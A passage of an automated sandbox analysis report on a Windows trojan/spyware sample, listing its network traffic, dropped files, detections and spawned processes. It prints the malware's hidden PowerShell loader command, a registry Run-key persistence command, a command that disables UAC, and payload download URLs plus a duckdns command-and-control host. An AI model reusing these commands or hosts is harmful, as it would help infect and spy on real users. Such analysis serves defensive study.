          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbu source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.pdbh source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb.> source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: em.Core.pdbM source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Numerics.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb, source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function 0_2_00405FFD: FindFirstFileA, FindClose
Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function 0_2_0040559B: GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\anziOUzZJs.exe; Code function 0_2_00402688: FindFirstFileA
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\anziOUzZJs.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts

          Networking

Source: Malware configuration extractor; URLs: PP9.duckdns.org
Source: unknown; DNS query: name: a458386d9.duckdns.org
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49726 -> 142.250.184.238:443
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 events)
Source: global traffic; DNS traffic detected: DNS query: drive.google.com
Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic; DNS traffic detected: DNS query: a458386d9.duckdns.org
Source: svchost.exe, 0000001A.00000002.2506873908.0000014BA0400000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.26.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.33.dr; String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr; String found in binary or memory: https://d.symcb.com/cps0%
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com//
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2010246217.0000000008330000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1$T
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000719E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download
          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000001A.00000003.1875644629.0000014BA02D0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: qmgr.db.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud

          Source: Yara match | File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00406344
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040488F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9EFF8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9F8C8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9ECB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0720BC18
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll 5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: anziOUzZJs.exe | Static PE information: invalid certificate
          Source: anziOUzZJs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/34@6/3
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File created: C:\Users\user\Desktop\Flyverdragter.lnk
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7800
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsd1C81.tmp
          Source: anziOUzZJs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: anziOUzZJs.exe | ReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File read: C:\Users\user\Desktop\anziOUzZJs.exe
          Source: unknown | Process created: C:\Users\user\Desktop\anziOUzZJs.exe "C:\Users\user\Desktop\anziOUzZJs.exe"
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Flyverdragter.lnk.0.dr  LNK file: ..\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\triorchism\hvidte.pal
          Source: Window Recorder  Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: anziOUzZJs.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Configuration.Install.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdbTzQs source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: tion.pdb source: powershell.exe, 0000000A.00000002.2009656049.000000000816C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbH source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdbc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb` source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb4X(w source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdbMZ@ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb4' source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbu source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
